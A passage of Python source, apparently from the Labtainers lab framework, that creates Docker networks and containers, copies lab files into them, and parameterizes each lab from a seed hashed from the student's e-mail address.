publish_param, clone_fullname, clone_host, volume,
multi_user, new_image_name)
logger.debug("Command to execute was (%s)" % createsinglecommand)
ps = subprocess.Popen(shlex.split(createsinglecommand), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1]) > 0:
logger.debug('command was %s' % createsinglecommand)
if 'Cannot connect to the Docker daemon' in output[1].decode('utf-8'):
print('\n\nERROR: Docker seems not to be running.')
print('Try "sudo systemctl restart docker"\n\n')
logger.error('CreateSingleContainer %s' % output[1].decode('utf-8'))
retval = False
break
#print('result of create %s' % output[0])
return retval
def GetIface(ip):
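''' Return the name of the network interface bound to the given IP address, parsed from ifconfig output. '''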
cmd = 'ifconfig | grep -B1 "inet addr:%s" | awk \'$1!="inet" && $1!="--" {print $1}\'' % ip
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
return output[0].decode('utf-8').strip()
def CheckPromisc(iface):
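''' Return True if the given interface reports the promiscuous (P) flag in "netstat -i" output. '''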
cmd = "netstat -i | grep enp0s8 | awk '{print $12}'"
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if 'P' in output[0].decode('utf-8'):
return True
else:
return False
# Create SUBNETS
def CreateSubnets(start_config):
has_tap = False
subnets = start_config.subnets
#for (subnet_name, subnet_network_mask) in networklist.iteritems():
for subnet_name in subnets:
subnet_network_mask = subnets[subnet_name].mask
logger.debug("subnet_name is %s" % subnet_name)
logger.debug("subnet_network_mask is %s" % subnet_network_mask)
if subnets[subnet_name].tap:
has_tap = True
command = "docker network inspect %s" % subnet_name
logger.debug("Command to execute is (%s)" % command)
inspect_result = subprocess.call(shlex.split(command), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
logger.debug("Result of subprocess.call CreateSubnets docker network inspect is %s" % inspect_result)
if inspect_result == FAILURE:
# Fail means does not exist - then we can create
macvlan = ''
ip_range = ''
net_type = 'bridge'
if subnets[subnet_name].macvlan_use is not None:
#iface = GetIface(subnets[subnet_name].macvlan)
iface = subnets[subnet_name].macvlan_use
if iface is None or len(iface) == 0:
logger.error("No IP assigned to network %s, assign an ip on Linux host to enable use of macvlan with Labtainers")
exit(1)
if not CheckPromisc(iface):
logger.warning("network %s not in promisc mode, required for macvlan inter-vbox comms\nUse: sudo ifconfig %s promisc" % (iface, iface))
macvlan = '-o parent=%s -o macvlan_mod=bridge' % iface
net_type = 'macvlan'
if subnets[subnet_name].ip_range is not None:
ip_range = '--ip-range %s' % subnets[subnet_name].ip_range
if subnets[subnet_name].gateway != None:
logger.debug(subnets[subnet_name].gateway)
subnet_gateway = subnets[subnet_name].gateway
command = "docker network create -d %s --gateway=%s --subnet %s %s %s %s" % (net_type, subnet_gateway, subnet_network_mask, macvlan, ip_range, subnet_name)
else:
command = "docker network create -d %s --subnet %s %s %s %s" % (net_type, subnet_network_mask, macvlan, ip_range, subnet_name)
logger.debug("Command to execute is (%s)" % command)
#create_result = subprocess.call(command, shell=True)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
logger.debug("stdout of subprocess.call CreateSubnets docker network create is %s" % output[0].decode('utf-8'))
if len(output[1]) > 0:
logger.debug('stderr of %s is %s' % (command, output[1].decode('utf-8')))
found_match_network = False
found_match_network_name = ""
# Before a hard exit - give the user some indication of what to do next
# First check to see if a gateway is provided and it is already used
if 'no matching subnet' in output[1].decode('utf-8'):
logger.error('Config error: %s' % output[1].decode('utf-8'))
exit(1)
if subnets[subnet_name].gateway != None:
found_match_network, found_match_network_name = FindNetworkGivenGatewayIP(subnets[subnet_name].gateway)
# If Gateway IP address not okay, no need to check subnet anymore
if not found_match_network:
# Gateway IP address might be okay but subnet mask might not
found_match_network, found_match_network_name = FindNetworkGivenSubnet(subnet_network_mask)
else:
# No Gateway IP address, check the subnet mask only
found_match_network, found_match_network_name = FindNetworkGivenSubnet(subnet_network_mask)
# At this point, if still not found then just print error and exit
if not found_match_network:
logger.error("Failed to create %s subnet at %s, %s\n" % (subnet_name, subnet_network_mask, output[1].decode('utf-8')))
logger.error("command was %s\n" % command)
sys.exit(1)
else:
# Found either a network matching the Gateway IP address or matching subnet
lablist = []
# See if any lab is using that network
lablist = GetListLabContainerOnNetwork(found_match_network_name)
if lablist == []:
# No lab is using the network - tell user to remove that "left-over" network
logger.error("An existing Docker network is preventing this lab from starting.")
logger.error("Try removing the network with:")
logger.error("docker network rm %s" % found_match_network_name)
sys.exit(1)
else:
# There is lab using that network - tell user to stop that lab first
logger.error("An existing Docker network is preventing this lab from starting.")
logger.error("This may be due to a failure to stop a previous lab.")
logger.error("Please stop the lab %s and try again." % lablist)
sys.exit(1)
else:
logger.warning("Already exists! Not creating %s subnet at %s!\n" % (subnet_name, subnet_network_mask))
return has_tap
def RemoveSubnets(subnets, ignore_stop_error):
for subnet_name in subnets:
command = "docker network rm %s" % subnet_name
logger.debug('command %s' % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].decode('utf-8')) > 0:
if ignore_stop_error:
logger.debug('Encountered error removing subnet %s' % subnet_name)
else:
logger.error('Encountered error removing subnet %s' % subnet_name)
EMAIL_TMP='./.tmp/email.txt'
def getHomeEmail():
''' compatibility for move of email to ~/.local/share/labtainers '''
homedir = os.environ['HOME']
lab_app = os.path.join(homedir,'.local', 'share', 'labtainers')
logger.debug('getHomeEmail lab_app %s' % lab_app)
try:
os.makedirs(lab_app)
except:
pass
email_path = os.path.join(lab_app, 'email.txt')
if not os.path.isfile(email_path):
logger.debug('getHomeEmail no email at %s' % email_path)
if os.path.isfile(EMAIL_TMP):
logger.debug('getHomeEmail copy from %s' % EMAIL_TMP)
shutil.copy(EMAIL_TMP, lab_app)
else:
if 'LABTAINER_DIR' in os.environ:
student_email = os.path.join(os.environ['LABTAINER_DIR'], 'scripts', 'labtainer-student','.tmp', 'email.txt')
if os.path.isfile(student_email):
shutil.copy(student_email, lab_app)
else:
logger.debug('No email found at %s' % student_email)
else:
logger.debug('LABTAINER_DIR not in env, no email path found')
return email_path
def getLastEmail():
retval = None
home_email = getHomeEmail()
if os.path.isfile(home_email):
with open(home_email) as fh:
retval = fh.read()
if retval is not None:
retval = retval.strip()
return retval
def putLastEmail(email):
home_email = getHomeEmail()
with open(home_email, 'w') as fh:
fh.write(email)
def GetLabSeed(lab_master_seed, student_email):
# Create hash using LAB_MASTER_SEED concatenated with user's e-mail
# LAB_MASTER_SEED is per laboratory - specified in start.config
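# e.g., GetLabSeed('someseed', 'student@example.com') returns md5('someseed:student@example.com') as a hex string
# (the e-mail above is only illustrative)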
string_to_be_hashed = '%s:%s' % (lab_master_seed, student_email)
mymd5 = hashlib.new('md5')
mymd5.update(string_to_be_hashed.encode('utf-8'))
mymd5_hex_string = mymd5.hexdigest()
return mymd5_hex_string
#def ParamStartConfig(lab_seed):
def ParamForStudent(lab_master_seed, mycontainer_name, mycontainer_image_name, container_user, container_password, labname,
student_email, lab_path, name, image_info, running_container=None):
# NOTE image_info may or may not be populated.
if running_container == None:
running_container = mycontainer_name
mymd5_hex_string = GetLabSeed(lab_master_seed, student_email)
logger.debug(mymd5_hex_string)
if not ParameterizeMyContainer(mycontainer_name, mycontainer_image_name, container_user, container_password, mymd5_hex_string,
student_email, labname, lab_path, name, image_info, running_container):
logger.error("Failed to parameterize lab container %s!\n" % mycontainer_name)
sys.exit(1)
logger.debug('back from ParameterizeMyContainer for %s' % mycontainer_name)
def DockerCmd(cmd, noloop=False):
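''' Run a docker command, retrying once after a one second delay on error (no retry if noloop is set).
Returns False on persistent errors or if stdout reports an unrecognized option or unexpected EOF. '''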
ok = False
count = 0
if noloop:
count = 1000
while not ok:
logger.debug("Command to execute is (%s)" % cmd)
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].decode('utf-8')) > 0:
count += 1
logger.debug("Failed cmd %s %s" % (cmd, output[1].decode('utf-8')))
if count > 1:
return False
time.sleep(1)
else:
ok = True
if len(output[0].decode('utf-8')) > 0:
logger.debug("cmd %s stdout: %s" % (cmd, output[0].decode('utf-8')))
out = output[0].decode('utf-8')
if 'unrecognized option' in out or 'Unexpected EOF' in out:
return False
return True
def CopyInstrConfig(mycontainer_name, container_user, lab_path):
cmd = 'docker cp %s/instr_config/. %s:/home/%s/.local/instr_config/' % (lab_path, mycontainer_name, container_user)
if not DockerCmd(cmd):
logger.error('failed %s' % cmd)
exit(1)
cmd = 'docker cp %s/config/. %s:/home/%s/.local/config/' % (lab_path, mycontainer_name, container_user)
if not DockerCmd(cmd):
logger.error('failed %s' % cmd)
exit(1)
def CopyLabBin(mycontainer_name, mycontainer_image_name, container_user, lab_path, name, image_info):
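''' Copy the lab_bin scripts into the container's ~/.local/bin, then install the lab_sys files by tarring
them, copying the tar into the container and extracting at / (falling back to an explicit docker cp);
on ubuntu20 images, switch mynotify.py to python3. '''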
here = os.path.dirname(os.path.abspath(__file__))
parent = os.path.dirname(here)
lab_bin_path = os.path.join(parent, 'lab_bin')
cmd = 'docker cp %s/. %s:/home/%s/.local/bin/' % (lab_bin_path, mycontainer_name, container_user)
if not DockerCmd(cmd):
logger.error('failed %s' % cmd)
exit(1)
''' TBD DO NOT move lab/config here -- would not catch the tar_list.txt files (skip list) '''
''' TBD perhaps move lab/_bin to here? would it save duplicate containers?'''
#container_bin = os.path.join(lab_path, name,'_bin')
#if os.path.isdir(container_bin):
# cmd = 'docker cp %s/. %s:/home/%s/.local/bin/' % (container_bin, mycontainer_name, container_user)
# DockerCmd(cmd)
tmp_dir=os.path.join('/tmp/labtainers', mycontainer_name)
shutil.rmtree(tmp_dir, ignore_errors=True)
try:
os.makedirs(tmp_dir)
except os.error:
logger.error("did not expect to find dir %s" % tmp_dir)
capinout = os.path.join(parent, 'lab_sys', 'usr','sbin', 'capinout')
if not os.path.isfile(capinout):
print('\n\n********* ERROR ***********')
print('%s is missing. If this is a development system, you may need to' % capinout)
print('go to the tool-src/capinout directory and run ./mkit.sh')
''' Copy file to /lib and /sys. Account for sym link fu '''
dest_tar = os.path.join(tmp_dir, 'labsys.tar')
lab_sys_path = os.path.join(parent, 'lab_sys')
cmd = 'tar cf %s -C %s usr etc' % (dest_tar, lab_sys_path)
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) > 0:
logger.error('tar failure %s result: %s' % (cmd, output[1].decode('utf-8')))
cmd = 'docker cp %s %s:/var/tmp/' % (dest_tar, mycontainer_name)
if not DockerCmd(cmd):
logger.error('failed %s' % cmd)
exit(1)
cmd = 'docker exec %s script -q -c "sudo tar -x --keep-directory-symlink -f /var/tmp/labsys.tar -C /"' % (mycontainer_name)
#if mycontainer_image_name in osTypeMap and osTypeMap[mycontainer_image_name] == 'ubuntu18':
# cmd = 'docker exec %s script -q -c "sudo tar -x --keep-directory-symlink -f /var/tmp/labsys.tar -C /"' % (mycontainer_name)
#else:
# cmd = 'docker exec %s script -q -c "sudo tar -x --keep-directory-symlink -f /var/tmp/labsys.tar -C /usr/"' % (mycontainer_name)
if not DockerCmd(cmd):
cmd = 'docker cp lab_sys/. %s:/' % (mycontainer_name)
#if osTypeMap[mycontainer_image_name] == 'ubuntu18':
# cmd = 'docker cp lab_sys/. %s:/' % (mycontainer_name)
#else:
# cmd = 'docker cp lab_sys/. %s:/usr/' % (mycontainer_name)
if not DockerCmd(cmd):
logger.error('failed %s' % cmd)
exit(1)
logger.debug('CopyLabBin tar failed for lab_sys, explicit copy')
if mycontainer_image_name in osTypeMap and osTypeMap[mycontainer_image_name] == 'ubuntu20':
cmd = 'docker exec %s script -q -c "sed -i \'s/env python/env python3/\' /usr/sbin/mynotify.py"' % (mycontainer_name)
if not DockerCmd(cmd):
logger.error('failed changing mynotify to python3: %s' % cmd)
exit(1)
# Copy Students' Artifacts from host to instructor's lab container
def CopyStudentArtifacts(labtainer_config, mycontainer_name, labname, container_user, container_password):
# Set the lab name
command = 'docker exec %s script -q -c "echo %s > /home/%s/.local/.labname" /dev/null' % (mycontainer_name, labname, container_user)
logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(command, shell=True)
logger.debug("Result of subprocess.call CopyStudentArtifacts set labname is %s (1=>FAILURE)" % result)
if result == FAILURE:
logger.error("Failed to set labname in container %s!\n" % mycontainer_name)
sys.exit(1)
# Create is_grade_container
command = 'docker exec %s script -q -c "echo TRUE > /home/%s/.local/.is_grade_container" /dev/null' % (mycontainer_name, container_user)
logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(command, shell=True)
logger.debug("Result of subprocess.call CopyStudentArtifacts create is_grade_container is %s (1=>FAILURE)" % result)
if result == FAILURE:
logger.error("Failed to create is_grade_container in container %s!\n" % mycontainer_name)
sys.exit(1)
username = getpass.getuser()
xfer_dir = os.path.join(labtainer_config.host_home_xfer, labname)
zip_filelist = glob.glob('/home/%s/%s/*.zip' % (username, xfer_dir))
logger.debug("filenames is (%s)" % zip_filelist)
# Copy zip files from 'Shared' folder to 'home/$CONTAINER_USER'
for fname in zip_filelist:
logger.debug("name is %s" % fname)
base_fname = os.path.basename(fname)
# Copy zip file
command = 'docker cp %s %s:/home/%s/' % (fname, mycontainer_name, container_user)
logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(shlex.split(command))
logger.debug("Result of subprocess.call CopyStudentArtifacts copy zipfile (%s) is %s (1=>FAILURE)" % (fname, result))
if result == FAILURE:
logger.error("Failed to copy student artifacts into container %s!\n" % mycontainer_name)
sys.exit(1)
#command = 'docker exec %s echo "%s\n" | sudo -S chown %s:%s /home/%s/%s' % (mycontainer_name, container_password,
# container_user, container_user, container_user, base_fname)
#command = 'docker exec %s chown %s:%s /home/%s/%s' % (mycontainer_name,
# container_user, container_user, container_user, base_fname)
#logger.debug("Command to execute is (%s)" % command)
#result = subprocess.call(command, shell=True)
#logger.debug("Result of subprocess.call CopyStudentArtifacts copy zipfile (%s) is %s" % (fname, result))
#if result == FAILURE:
# logger.error("Failed to set labname in container %s!\n" % mycontainer_name)
# sys.exit(1)
def GetRunningContainersList():
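''' Return (True, <list of running container names>) from "docker container ls",
or (False, ...) if the command fails or no containers are running. '''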
cmd = "docker container ls --format {{.Names}}"
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].decode('utf-8').strip()) > 0:
logger.debug('No running containers: error returned %s, return false' % output[1].decode('utf-8'))
return False, None
result = output[0].decode('utf-8').strip()
logger.debug('result is %s' % result)
if 'Error:' in result or len(result.strip()) == 0:
if 'Error:' in result:
logger.debug("Command was (%s)" % cmd)
logger.debug("Error from command = '%s'" % result)
return False, result
containers_list = result.split('\n')
return True, containers_list
def GetRunningLabNames(containers_list):
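''' Given a list of container names, return (found, labnames) where labnames are the distinct
lab names of containers whose names end in ".student". '''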
labnameslist = []
found_lab_role = False
for each_container in containers_list:
#print each_container
if each_container.endswith('.student'):
splitstring = each_container.split('.')
labname = splitstring[0]
found_lab_role = True
if labname not in labnameslist:
labnameslist.append(labname)
return found_lab_role, labnameslist
class ImageInfo():
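''' Record describing a container image: name, creation time, user, whether it exists locally,
whether it was built locally (no registry prefix), its version label and the tag to use. '''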
def __init__(self, name, creation, user, local, local_build, version, use_tag):
self.name = name
self.creation = creation
self.user = user
self.local = local
''' whether a locally built image '''
self.local_build = local_build
self.version = None
self.use_tag = use_tag
if version is not None:
version = version.replace('"', '')
if version != 'null' and len(version.strip()) > 0:
try:
self.version = version
except:
logger.error('failed getting version from string <%s>' % version)
traceback.print_exc()
traceback.print_stack()
exit(1)
def inspectImage(image_name):
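''' Return (created, user, version) for a local image via docker inspect; each value is None if unavailable. '''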
created = None
user = None
version = None
cmd = "docker inspect -f '{{.Created}}' --type image %s" % image_name
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[0].decode('utf-8').strip()) > 0:
created = output[0].decode('utf-8').strip()
cmd = "docker inspect -f '{{.Config.User}}' --type image %s" % image_name
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[0].decode('utf-8').strip()) > 0:
user = output[0].decode('utf-8').strip()
cmd = "docker inspect --format='{{json .Config.Labels.version}}' --type image %s" % image_name
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[0].decode('utf-8').strip()) > 0:
version = output[0].decode('utf-8').strip()
return created, user, version
def imageInfo(image_name, registry, base_registry, labtainer_config, is_rebuild=False, no_pull=False, quiet=False, local_build=False):
''' image_name lacks registry info (always)
First look if plain image name exists, suggesting
an ongoing build/test situation '''
retval = None
use_tag = 'latest'
created, user, version = inspectImage(image_name)
if created is not None:
retval = ImageInfo(image_name, created, user, True, True, version, use_tag)
logger.debug('%s local built, ts %s %s' % (image_name, created, user))
else:
''' next see if there is a local image from the desired registry '''
with_registry = '%s/%s' % (registry, image_name)
created, user, version = inspectImage(with_registry)
if created is not None:
retval = ImageInfo(with_registry, created, user, True, False, version, use_tag)
logger.debug('%s local from reg, ts %s %s version: %s' % (with_registry, created, user, version))
elif not local_build:
''' See if the image exists in the desired registry '''
reg_host = None
if ':' in labtainer_config.test_registry:
reg_host = labtainer_config.test_registry.split(':')[0]
logger.debug('imageInfo reg_host: %s registry: %s' % (reg_host, registry))
if reg_host is not None and registry.startswith(reg_host):
created, user, version, use_tag, base = InspectLocalReg.inspectLocal(image_name, logger,
registry, is_rebuild=is_rebuild, quiet=quiet, no_pull=no_pull)
else:
created, user, version, use_tag = InspectRemoteReg.inspectRemote(with_registry, logger,
is_rebuild=is_rebuild, quiet=quiet, no_pull=no_pull, base_registry=base_registry)
if created is None and not is_rebuild:
if not InspectRemoteReg.reachDockerHub():
logger.error('Unable to reach DockerHub. \nIs the network functional?\n')
if created is not None:
logger.debug('%s only on registry %s, ts %s %s version %s use_tag %s' % (with_registry, registry, created, user, version, use_tag))
retval = ImageInfo(with_registry, created, user, False, False, version, use_tag)
if retval is None:
logger.debug('%s not found local_build was %r' % (image_name, local_build))
return retval
def GetBothConfigs(lab_path, logger, servers=None, clone_count=None):
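''' Parse and return the global labtainer.config and the lab's start.config. '''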
labtainer_config_dir = os.path.join(os.path.dirname(os.path.dirname(lab_path)), 'config', 'labtainer.config')
labtainer_config = ParseLabtainerConfig.ParseLabtainerConfig(labtainer_config_dir, logger)
labname = os.path.basename(lab_path)
config_path = os.path.join(lab_path,"config")
start_config_path = os.path.join(config_path,"start.config")
start_config = ParseStartConfig.ParseStartConfig(start_config_path, labname,
labtainer_config, logger, servers=servers, clone_count=clone_count)
return labtainer_config, start_config
def dockerPull(registry, image_name):
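''' Pull the named image from the given registry; return False if docker pull reports an error. '''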
cmd = 'docker pull %s/%s' % (registry, image_name)
logger.debug('%s' % cmd)
print('pulling %s from %s' % (image_name, registry))
ps = subprocess.Popen(shlex.split(cmd), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
output = ps.communicate()
if len(output[1]) > 0:
return False
print('Done with pull')
return True
def defineAdditionalIP(container_name, post_start_if, post_start_nets):
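''' Assign additional IP addresses inside the container as interface aliases (<iface>:N) for
subnets whose extra addresses docker could not attach directly. '''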
for subnet in post_start_nets:
existing_ip = post_start_if[subnet]
cmd = "docker exec %s bash -c 'ifconfig'" % (container_name)
logger.debug('cmd is %s' % cmd)
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
logger.debug('out0 %s \nout1 %s' % (output[0].decode('utf-8'), output[1].decode('utf-8')))
current_if = None
this_if = None
for line in output[0].decode('utf-8').splitlines():
parts = line.split()
if len(parts) < 2:
continue
if parts[1] == 'Link':
current_if = parts[0]
elif parts[1] == ('addr:%s' % post_start_if[subnet]):
this_if = current_if
break
count = 1
for ip in post_start_nets[subnet]:
cmd = "docker exec %s bash -c 'ifconfig %s:%d %s'" % (container_name, this_if, count, ip)
logger.debug('next cmd is %s' % cmd)
if not DockerCmd(cmd):
print('error doing %s' % cmd)
exit(1)
count += 1
def MakeNetMap(start_config, mycontainer_name, container_user):
''' filter docker network list to include only tapped lans, and append MAC to each line '''
cmd = "docker network ls"
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
nlist = []
for subnet in start_config.subnets:
if start_config.subnets[subnet].tap == 'yes':
nlist.append(subnet)
if len(output[1].strip()) == 0:
with open('/tmp/net_map.txt', 'w') as fh:
''' for each network reported by docker '''
for line in output[0].decode('utf-8').splitlines():
parts = line.split()
net = parts[1]
eth = 'br-%s' % parts[0]
''' find if it matches a tapped subnet in this lab '''
for subnet in nlist:
if subnet == net:
''' NOTE mac is no longer used, include for compatibility. Remove later '''
mac = get_hw_address(eth)
new_line = '%s %s\n' % (line, mac)
fh.write(new_line)
break
cmd = 'docker cp /tmp/net_map.txt %s:/var/tmp/' % (mycontainer_name)
DockerCmd(cmd)
def WaitForTap():
tap_dir = GetWaitTapDir()
tap_lock = os.path.join(tap_dir,'lock')
while not os.path.isdir(tap_lock):
logger.debug('tap dir does not yet exist')
time.sleep(1)
def DoStartOne(labname, name, container, start_config, labtainer_config, lab_path,
student_email, quiet_start, results, auto_grade, image_info):
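''' Thread target: create (if needed), connect, start and parameterize one container and its clones,
then apply X11, gateway and tap adjustments; appends True/False to the shared results list. '''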
retval = True
mycontainer_name = container.full_name
mycontainer_image_name = container.image_name
container_user = container.user
container_password = container.password
container_hostname = container.hostname
''' manage interfaces with multiple IP addresses, docker does not support this directly '''
post_start_if = {}
post_start_nets = {}
haveContainer = AllContainersCreated(container)
logger.debug("DoStart for %s AllContainersCreated result (%s)" % (container.name, haveContainer))
# Set need_seeds=False first
need_seeds=False
# IsContainerCreated returns False if the container does not exist
if not haveContainer:
# Container does not exist, create the container
# Use CreateSingleContainer()
containerCreated = False
if len(container.container_nets) == 0 or container.tap == 'yes':
containerCreated = CreateSingleContainer(labtainer_config, start_config, container, quiet=quiet_start)
else:
#mysubnet_name, mysubnet_ip = container.container_nets.popitem()
mysubnet_name = next(iter(container.container_nets))
mysubnet_ip = container.container_nets[mysubnet_name]
container.did_net(mysubnet_name)
subnet_name = mysubnet_name
if ':' in mysubnet_name:
subnet_name = mysubnet_name.split(':')[0]
post_start_if[subnet_name] = mysubnet_ip
containerCreated = CreateSingleContainer(labtainer_config, start_config, container, subnet_name, mysubnet_ip, quiet=quiet_start)
logger.debug("CreateSingleContainer %s result (%s)" % (mycontainer_name, containerCreated))
if not containerCreated:
logger.error("CreateSingleContainer fails to create container %s!\n" % mycontainer_name)
results.append(False)
return
# Give the container some time -- just in case
#time.sleep(3)
# If we just create it, then set need_seeds=True
need_seeds=True
# Check again -
haveContainer = AllContainersCreated(container)
logger.debug("AllContainersCreated second check for %s result (%s)" % (container.name, haveContainer))
# IsContainerCreated returns False if the container does not exist
if not haveContainer:
logger.error("Container %s still not created!\n" % mycontainer_name)
results.append(False)
return
clone_names = GetContainerCloneNames(container)
for mycontainer_name in clone_names:
wait_for_tap = False
for mysubnet_name, mysubnet_ip in container.container_nets.items():
if start_config.subnets[mysubnet_name].tap:
wait_for_tap = True
if mysubnet_name in container.did_nets:
continue
subnet_name = mysubnet_name
if ':' in mysubnet_name:
subnet_name = mysubnet_name.split(':')[0]
if subnet_name not in post_start_nets:
post_start_nets[subnet_name] = []
if subnet_name not in post_start_if:
post_start_if[subnet_name] = mysubnet_ip
logger.debug('container: %s assigned post_start_if[%s] %s, connecting' % (mycontainer_name, subnet_name, mysubnet_ip))
connectNetworkResult = ConnectNetworkToContainer(start_config, mycontainer_name, subnet_name, mysubnet_ip)
else:
post_start_nets[subnet_name].append(mysubnet_ip)
else:
connectNetworkResult = ConnectNetworkToContainer(start_config, mycontainer_name, mysubnet_name, mysubnet_ip)
if wait_for_tap:
WaitForTap()
# Start the container
if not StartMyContainer(mycontainer_name):
logger.error("Container %s failed to start!\n" % mycontainer_name)
results.append(False)
return
defineAdditionalIP(mycontainer_name, post_start_if, post_start_nets)
clone_need_seeds = need_seeds
if not clone_need_seeds:
cmd = "docker exec %s bash -c 'ls -l /var/labtainer/did_param'" % (mycontainer_name)
if not DockerCmd(cmd):
print('One or more containers exist but are not parameterized.')
print('Please restart this lab with the "-r" option.')
DoStop(start_config, labtainer_config, lab_path, False)
logger.error('One or more containers exist but are not parameterized.')
sys.exit(1)
# If the container is just created, then use the previous user's e-mail
# then parameterize the container
elif quiet_start and clone_need_seeds:
ParamForStudent(start_config.lab_master_seed, mycontainer_name, mycontainer_image_name, container_user, container_password,
labname, student_email, lab_path, name, image_info)
elif clone_need_seeds:
ParamForStudent(start_config.lab_master_seed, mycontainer_name, mycontainer_image_name, container_user,
container_password, labname, student_email, lab_path, name, image_info)
if container.x11.lower() == 'yes':
''' Avoid problems caused by container wiping out all of /tmp on startup '''
cmd = "docker exec %s bash -c 'if [ -d /tmp/.X11-unix ]; then rm -Rf /tmp/.X11-unix; fi'" % (mycontainer_name)
if not DockerCmd(cmd):
logger.error('failed %s' % cmd)
exit(1)
cmd = "docker exec %s bash -c 'ln -s /var/tmp/.X11-unix /tmp/.X11-unix'" % (mycontainer_name)
if not DockerCmd(cmd):
logger.error('failed %s' % cmd)
exit(1)
if container.no_gw:
cmd = "docker exec %s bash -c 'sudo /bin/ip route del 0/0'" % (mycontainer_name)
DockerCmd(cmd)
cmd = "docker exec %s bash -c 'sudo route del default'" % (mycontainer_name)
DockerCmd(cmd)
if container.tap == 'yes':
MakeNetMap(start_config, mycontainer_name, container_user)
if container.lab_gateway is not None:
cmd = "docker exec %s bash -c 'sudo /usr/bin/set_default_gw.sh %s'" % (mycontainer_name,
container.lab_gateway)
DockerCmd(cmd)
'''
ignore error. TBD filter errors due to my_host not being set
if not DockerCmd(cmd):
logger.error('Fatal error in docker command %s' % cmd)
results.append(False)
return
'''
cmd = "docker exec %s bash -c 'sudo echo \"nameserver %s\" >/etc/resolv.conf'" % (mycontainer_name,
container.lab_gateway)
if not DockerCmd(cmd):
logger.error('Fatal error in docker command %s' % cmd)
results.append(False)
return
cmd = "docker exec %s bash -c 'sudo route del my_host'" % (mycontainer_name)
DockerCmd(cmd)
results.append(retval)
def GetUserEmail(quiet_start):
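''' Prompt the student for an e-mail address, offering the previously saved address as the default
(used automatically for quiet starts); non-empty new entries are saved for reuse. '''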
user_email = None
while user_email is None:
done = True
# Prompt user for e-mail address
eprompt = 'Please enter your e-mail address: '
prev_email = getLastEmail()
if prev_email is not None:
eprompt = eprompt+" [%s]" % prev_email
#checks if quiet_start is true
if quiet_start and prev_email is not None:
user_email = prev_email
else:
if sys.version_info >=(3,0):
user_input = input(eprompt)
else:
user_input = raw_input(eprompt)
if not all(c in string.printable for c in user_input):
print('Bad characters detected. Please re-enter email')
else:
user_email = user_input
if user_email is not None:
#user_email = input(eprompt)
if len(user_email.strip()) == 0:
if prev_email is None:
print('You have provided an empty email address, which may cause your results to not be graded.')
if sys.version_info >=(3,0):
confirm = str(input('Use the empty address? (y/n)')).lower().strip()
else:
confirm = str(raw_input('Use the empty address? (y/n)')).lower().strip()
if confirm != 'y':
user_email = None
else:
user_email = prev_email
else:
putLastEmail(user_email)
return user_email
def CheckLabContainerApps(start_config, lab_path, apps2start):
apps2search = ['firefox', 'wireshark']
has_multi_container = False
num_containers = len(start_config.containers.items())
if num_containers > 1:
has_multi_container = True
apps2startfilepath = os.path.join(lab_path, '*/_bin', 'student_startup.sh')
apps2start_list = glob.glob('%s' % apps2startfilepath)
if apps2start_list != []:
# Parse each student_startup.sh - get a list of apps to start
# Currently only search for firefox or wireshark
for eachfile in apps2start_list:
with open(eachfile) as fh:
for line in fh:
if line.startswith('#') or len(line) == 0:
continue
for apps in apps2search:
if apps in line:
if apps not in apps2start:
apps2start.append(apps)
return has_multi_container
def ReloadStartConfig(lab_path, labtainer_config, start_config, student_email, logger, servers, clone_count):
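''' Build (or reuse) a cached copy of start.config under ./.tmp/<labname>, parameterize it using the
lab instance seed derived from the student e-mail, and reparse it. '''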
labname = os.path.basename(lab_path)
my_start_config = os.path.join('./.tmp',labname, 'start.config')
if not os.path.isfile(my_start_config):
config_path = os.path.join(lab_path,"config")
start_config_path = os.path.join(config_path,"start.config")
param_path = os.path.join(config_path,"parameter.config")
try:
os.makedirs(os.path.dirname(my_start_config))
except os.error:
pass
shutil.copyfile(start_config_path, my_start_config)
lab_instance_seed = GetLabSeed(start_config.lab_master_seed, student_email)
logger.debug("lab_instance_seed for <%s> <%s> is %s" % (start_config.lab_master_seed, student_email, lab_instance_seed))
pp = ParameterParser.ParameterParser(None, None, lab_instance_seed, logger, lab=labname)
pp.ParseParameterConfig(param_path)
pp.DoReplace()
start_config = ParseStartConfig.ParseStartConfig(my_start_config, labname, labtainer_config, logger, skip_networks=False,
servers=servers, clone_count=clone_count)
logger.debug('did start.config reload from %s' % my_start_config)
return start_config
def CheckEmailReloadStartConfig(start_config, quiet_start, lab_path, labtainer_config, logger, servers, clone_count):
student_email = None
for name, container in start_config.containers.items():
# Obscure means of making sure we have an email and getting one if
# a container has not yet been created.
if not AllContainersCreated(container) and student_email is None:
if student_email == None:
student_email = GetUserEmail(quiet_start)
else:
student_email = GetUserEmail(True)
if student_email == None:
student_email = GetUserEmail(True)
start_config = ReloadStartConfig(lab_path, labtainer_config, start_config, student_email, logger, servers, clone_count)
return start_config, student_email
def pidExists(pid):
